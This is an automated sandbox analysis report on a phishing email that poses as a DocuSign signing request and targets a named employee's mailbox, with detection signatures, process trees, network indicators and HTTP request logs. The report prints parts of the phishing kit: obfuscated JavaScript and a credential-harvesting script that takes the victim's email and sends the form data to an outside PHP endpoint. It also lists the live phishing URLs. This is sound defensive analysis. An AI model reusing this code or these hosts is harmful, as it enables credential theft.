Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Complete via DocuSign_ #Dailycer_Doc. Signature required 4_14_2025.eml

Overview

General Information

Sample name:Complete via DocuSign_ #Dailycer_Doc. Signature required 4_14_2025.eml
Analysis ID:1665452
MD5:618db968b6869977d5466d09ee5fa8b9
SHA1:7e3f005e281fc28b2433e622672ab81c4aac901c
SHA256:688fd9ec6c97c43158d5fe8942b223238e6c3e07cef7f14036da7580dab8b0b9
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Yara detected ZipBomb
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
HTML page contains obfuscated javascript
Javascript uses Clearbit API to dynamically determine company logos
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 2776 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Complete via DocuSign_ #Dailycer_Doc. Signature required 4_14_2025.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 928 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "84EB8B22-0E1C-47C4-B964-A25CCED8EA3E" "DB1CD557-11DF-46A3-8117-B5001063451C" "2776" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZy MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,14906612120549523128,8134245420273908653,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • rundll32.exe (PID: 2848 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wscript.exe (PID: 7996 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\92536330-acb6-4dca-9467-cbe601556772.tmpJoeSecurity_ZipBombYara detected ZipBombJoe Security
    C:\Users\user\Downloads\92536330-acb6-4dca-9467-cbe601556772.tmpJoeSecurity_ZipBombYara detected ZipBombJoe Security
      SourceRuleDescriptionAuthorStrings
      3.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        3.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          3.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , ProcessId: 7996, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , ProcessId: 7996, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , ProcessId: 7996, ProcessName: wscript.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4100, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe" , ProcessId: 7996, ProcessName: wscript.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-15T15:05:08.264336+020020294931A Network Trojan was detected192.168.2.16560881.1.1.153UDP
            2025-04-15T15:05:08.264494+020020294931A Network Trojan was detected192.168.2.16551941.1.1.153UDP

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frJoe Sandbox AI: Score: 7 Reasons: The URL 'dour-automatic-transport.glitch.me' does not match the legitimate domain for Dailycer, which is likely 'dailycer.com'., The domain 'glitch.me' is a platform for hosting web applications and is not directly associated with Dailycer., The presence of a personal email address 'david.bonnel@dailycer.fr' and an 'Email Password' input field is suspicious and indicative of phishing attempts., The URL contains unrelated words 'dour-automatic-transport', which do not align with the brand Dailycer., The use of a third-party domain like 'glitch.me' for a brand's official site is unusual and raises suspicion. DOM: 3.2.pages.csv
            Source: Yara matchFile source: 3.2.pages.csv, type: HTML
            Source: Yara matchFile source: 3.3.pages.csv, type: HTML
            Source: Yara matchFile source: 3.4.pages.csv, type: HTML
            Source: EmailJoe Sandbox AI: Page contains button: 'VIEW_DOC' Source: 'Email'
            Source: EmailJoe Sandbox AI: Email contains prominent button: 'view_doc'
            Source: 3.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dour-automatic-transport.glitch.me/... This script exhibits several high-risk behaviors, including data exfiltration, dynamic code execution, and suspicious redirection. It extracts user email from the URL hash, sends form data to an external server, and redirects the user to a potentially malicious domain. These behaviors indicate a high likelihood of malicious intent, such as phishing or credential theft.
            Source: Complete via DocuSign_ #Dailycer_Doc. Signature required 4_14_2025.emlJoe Sandbox AI: Detected potential phishing email: The email contains repetitive content that appears artificially duplicated, which is a common phishing tactic. The sender email domain (chcengineering.com) doesn't match the claimed DocuSign/Dailycer service. The suspicious URL contains multiple redirects and encoded parameters, typical of phishing links
            Source: Complete via DocuSign_ #Dailycer_Doc. Signature required 4_14_2025.emlJoe Sandbox AI: Detected suspicious elements in Email header: Email sent from localhost (127.0.0.1) but actual IP is from unknown source (135.119.114.102). Mismatch between x-originating-ip (27.254.152.87) and the sending IP (135.119.114.102). Multiple IP addresses involved suggests potential IP spoofing or malicious routing. Sending server (ssggrating.com) doesn't match the sender's domain (chcengineering.com). Base64 encoding of content can be used to obscure malicious content. Multiple geographical indicators suggest suspicious routing (Asian IPs sending to French recipient). No SPF, DKIM, or DMARC authentication results present in headers
            Source: https://jbse.belgrin.com.au/_a.html?send_id=eh&tvi2_RxT=www.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH&e=ZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyHTTP Parser: <!--var _0x3c8934=_0x51dd;function _0x1ab2(){var _0x3d8857=['65%2E%64%6','3%74%20%74','6%4C%79%39'
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: (function(){function _0x13CCC(_0x13C97,_0x13CCC){return eval(Ox$("Cfi)c_ti9a(u3e)r ns,p(xeu7+th0C)C
            Source: https://dour-automatic-transport.glitch.me/HTTP Parser: document.addeventlistener("domcontentloaded", function () { const phpurl = "https://xsapz.com/docu/me.php"; const fullurl = window.location.href; // regular expression to extract email from hash const emailregex = /#([^#]+)$/; const match = fullurl.match(emailregex); const email = match ? match[1] : null; const emaildecoded = email ? decodeuricomponent(email) : null; if (emaildecoded) { const domain = emaildecoded.split('@')[1]; const companyname = domain ? domain.split('.')[0] : "unknown"; // populate html elements with extracted data const emailinput = document.getelementbyid("eemail"); const favicon = document.getelementbyid("favicon"); const logoimg = document.getelementbyid("logoimg"); const titleelement = document.getelementbyid("tittle"); const logoname = document.getelementbyid("logoname"); const footertext = document.getelementbyid("footer-text"); if (emailinput) emailinput.value =...
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: Number of links: 0
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https:%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyHTTP Parser: Base64 decoded: david.bonnel@dailycer.fr
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: Title: dailycer - Mail does not match URL
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: Invalid link: Forgot Password?
            Source: EmailClassification: Credential Stealer
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: <input type="password" .../> found
            Source: https://jbse.belgrin.com.au/_a.html?send_id=eh&tvi2_RxT=www.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH&e=ZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyHTTP Parser: No favicon
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: No <meta name="author".. found
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: No <meta name="author".. found
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: No <meta name="author".. found
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: No <meta name="copyright".. found
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: No <meta name="copyright".. found
            Source: https://dour-automatic-transport.glitch.me/#david.bonnel@dailycer.frHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.15.99:443 -> 192.168.2.16:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 110.173.134.108:443 -> 192.168.2.16:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 110.173.134.108:443 -> 192.168.2.16:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.16:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.16:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 110.173.134.108:443 -> 192.168.2.16:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.59:443 -> 192.168.2.16:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.59:443 -> 192.168.2.16:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.147.188:443 -> 192.168.2.16:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.161.136.24:443 -> 192.168.2.16:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.161.136.24:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.161.136.24:443 -> 192.168.2.16:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 66.29.153.55:443 -> 192.168.2.16:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 66.29.153.55:443 -> 192.168.2.16:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.220.172.6:443 -> 192.168.2.16:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.220.172.6:443 -> 192.168.2.16:49773 version: TLS 1.2
            Source: chrome.exeMemory has grown: Private usage: 8MB later: 39MB
            Source: Network trafficSuricata IDS: 2029493 - Severity 1 - ET PHISHING Possible Glitch.me Phishing Domain : 192.168.2.16:56088 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2029493 - Severity 1 - ET PHISHING Possible Glitch.me Phishing Domain : 192.168.2.16:55194 -> 1.1.1.1:53
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 173.194.219.94
            Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
            Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
            Source: unknownTCP traffic detected without corresponding DNS query: 173.194.219.94
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZy HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /styles.16be3c9519762a3240e8.css HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /runtime.3847a57210e62cb7ac86.js HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /polyfills.2daf523d1a5fc162c0c2.js HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /main.3791483c41ff7549eac3.js HTTP/1.1Host: antiphishing.vadesecure.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
